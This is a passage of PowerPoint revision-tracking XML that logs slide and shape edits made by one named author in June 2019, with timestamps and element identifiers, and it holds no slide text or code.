          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{76317A58-62E7-4136-E2CA-2EE2F09DE271}" dt="2019-06-05T23:13:34.295" v="90" actId="1076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Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{76317A58-62E7-4136-E2CA-2EE2F09DE271}" dt="2019-06-05T23:13:28.185" v="89"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="109857222" sldId="256"/>
            <ac:spMk id="5" creationId="{5AF4DEEB-EB14-4A59-81E0-261B1E12E840}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{76317A58-62E7-4136-E2CA-2EE2F09DE271}" dt="2019-06-05T22:48:03.382" v="83" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2696278330" sldId="270"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{76317A58-62E7-4136-E2CA-2EE2F09DE271}" dt="2019-06-05T22:48:03.382" v="83" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2696278330" sldId="270"/>
            <ac:spMk id="4" creationId="{0F466325-8DB1-47C8-A7D4-280079B59ABB}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}"/>
    <pc:docChg chg="addSld delSld modSld">
      <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:54:04.685" v="864" actId="1076"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp add del">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:54:04.685" v="864" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1926449966" sldId="257"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:43:00.534" v="627" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1926449966" sldId="257"/>
            <ac:spMk id="2" creationId="{87BB03A3-9C31-4CFE-B7EC-501A92F713CE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:42:08.534" v="598" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1926449966" sldId="257"/>
            <ac:spMk id="3" creationId="{38858550-EB68-4712-9AA3-FF450953D228}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:54:04.669" v="863" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1926449966" sldId="257"/>
            <ac:spMk id="4" creationId="{2DDEECF7-AF9E-4EF3-91A3-689445B25498}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:54:04.685" v="864" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1926449966" sldId="257"/>
            <ac:spMk id="6" creationId="{A4FF51CD-00ED-4538-90A0-2887499F6587}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:43:19.440" v="631" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1926449966" sldId="257"/>
            <ac:spMk id="7" creationId="{64BB1751-D3DC-4471-B6B0-BE6ADE79F9AF}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add del">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:45:32.080" v="643" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2886590775" sldId="258"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:01:42.164" v="27" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="2" creationId="{6E15723C-2368-4809-A835-2A53B4CC56DC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:02:24.898" v="30"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="3" creationId="{7200B702-4D35-46CE-9CF9-B0946A6D7592}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:03:14.944" v="43" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="4" creationId="{8AE5C81D-0FFB-4CBD-BF89-8872B36B94EF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:02:42.054" v="33" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="6" creationId="{53E9DF78-EFAC-4F59-8611-0FEDADADCA6A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:02:42.070" v="34" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="7" creationId="{0F04E23D-A26E-4029-B989-CC81B51B3DB5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:02:42.085" v="35" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="8" creationId="{5B1A0ACD-7B0B-4F6B-AED4-F2F5B2C68BAC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:02:42.117" v="36" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="9" creationId="{D718A3D6-FC8B-4691-A3BA-54C25E2D20F3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:02:47.117" v="38" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="10" creationId="{966440A0-F4F2-4001-9BE7-5D9C213C4A63}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:02:42.132" v="37" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="11" creationId="{27CA9ED9-F5A6-426C-8EEB-3307AB12BA3E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:45:32.080" v="643" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="13" creationId="{F96710B7-59FF-4B5B-B88E-0B3275D58AE8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:02:59.054" v="40" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="15" creationId="{D96DA130-F79F-4B78-A80E-33354F80026C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:02:54.710" v="39" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="18" creationId="{DA260270-63F7-4E17-8ECA-5CCA0C71D60E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add del">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:44:08.252" v="638" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2809929173" sldId="259"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:07:16.161" v="224" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2809929173" sldId="259"/>
            <ac:spMk id="3" creationId="{E9514551-CD8A-40A6-A998-E7618E31C4FA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:39:09.552" v="545"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2809929173" sldId="259"/>
            <ac:spMk id="5" creationId="{D1CB152A-E8C6-4642-8761-9A7C31E61713}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:44:08.252" v="638" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2809929173" sldId="259"/>
            <ac:spMk id="6" creationId="{F8B6CE1F-C11B-434D-B9B2-56DE5E15CD25}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add del">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:43:51.518" v="633" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3389707094" sldId="260"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:05:34.912" v="142"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="5" creationId="{5EA71619-7F44-45B9-A914-4CE8B3B96203}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:05:34.912" v="141"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="6" creationId="{E9131EC6-F179-44CF-92B2-150516411302}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:05:34.912" v="140"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="7" creationId="{A0ACCE37-DFD4-4F05-9F63-DB5BBF156C6C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:05:34.896" v="139"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="8" creationId="{C5184F34-5CD6-4F2B-8331-3C64F01D347F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:05:34.896" v="138"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="9" creationId="{50EB8D91-27F6-475F-B492-10CF534F0296}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:05:34.896" v="137"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="10" creationId="{803F2287-8D29-443A-B474-51DD77920CF6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:03:52.366" v="103" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="11" creationId="{4433FC25-B531-47BF-9B5B-3260DC990C9B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:43:51.518" v="633" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="14" creationId="{225D98CD-0F4A-47A2-B4A5-5F0AFEAF6928}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add del">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:49:12.265" v="695" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1727781075" sldId="261"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:39:46.004" v="557" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:spMk id="3" creationId="{2E57E17D-B5F0-46C7-9504-7C20ABA2E4F1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:40:52.644" v="586" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:spMk id="4" creationId="{738ABD5B-44C3-4BF8-9232-2B17C43E1C9D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:48:46.687" v="694" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:spMk id="5" creationId="{6AA73F9F-6A4A-4B5C-8355-CDB1E8885A7C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:49:12.265" v="695" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:spMk id="6" creationId="{81DFE1AE-A13A-4DAC-9A43-B1A285A26948}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:48:38.875" v="693" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:picMk id="7" creationId="{4FA8F82E-35D7-4541-B455-2A0E171F27B3}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add del">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:53:03.045" v="861" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3166696917" sldId="263"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:53:03.045" v="861" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3166696917" sldId="263"/>
            <ac:spMk id="7" creationId="{08EE7223-1559-4620-9DED-F93E126C447A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:51:27.999" v="834" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3166696917" sldId="263"/>
            <ac:spMk id="9" creationId="{C3928157-243E-437F-A637-49B080B226CC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:50:20.468" v="716" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3166696917" sldId="263"/>
            <ac:spMk id="11" creationId="{187E7847-61A2-472D-8F2B-CF61380CE533}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:51:19.311" v="804" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3166696917" sldId="263"/>
            <ac:spMk id="12" creationId="{1221AC2F-D843-4D0F-9B1A-C8A0B263014B}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add del">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:48:21.469" v="690" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="458480970" sldId="267"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:48:21.469" v="690" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="458480970" sldId="267"/>
            <ac:spMk id="5" creationId="{CAF3DF89-A507-4527-8C36-8E1BA28FE08E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:07:42.505" v="227" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="458480970" sldId="267"/>
            <ac:picMk id="7" creationId="{C1C523EC-ACDB-4321-AFE1-33420F3E0C39}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add del">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:41:31.285" v="594" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1838342288" sldId="269"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:08:39.161" v="230" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:spMk id="6" creationId="{D9015465-6EB7-4351-B478-AB5BC688F149}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:41:13.222" v="587"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:spMk id="13" creationId="{7BBAD014-44E3-4389-876A-A7901BAAD8BE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:41:31.285" v="594" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:spMk id="14" creationId="{D5C8A1F7-9EF7-4639-9B05-3DF76595841A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:41:13.222" v="588"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:picMk id="10" creationId="{FC1524B6-C358-40D3-9C16-5C886352CF05}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:41:31.269" v="593" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
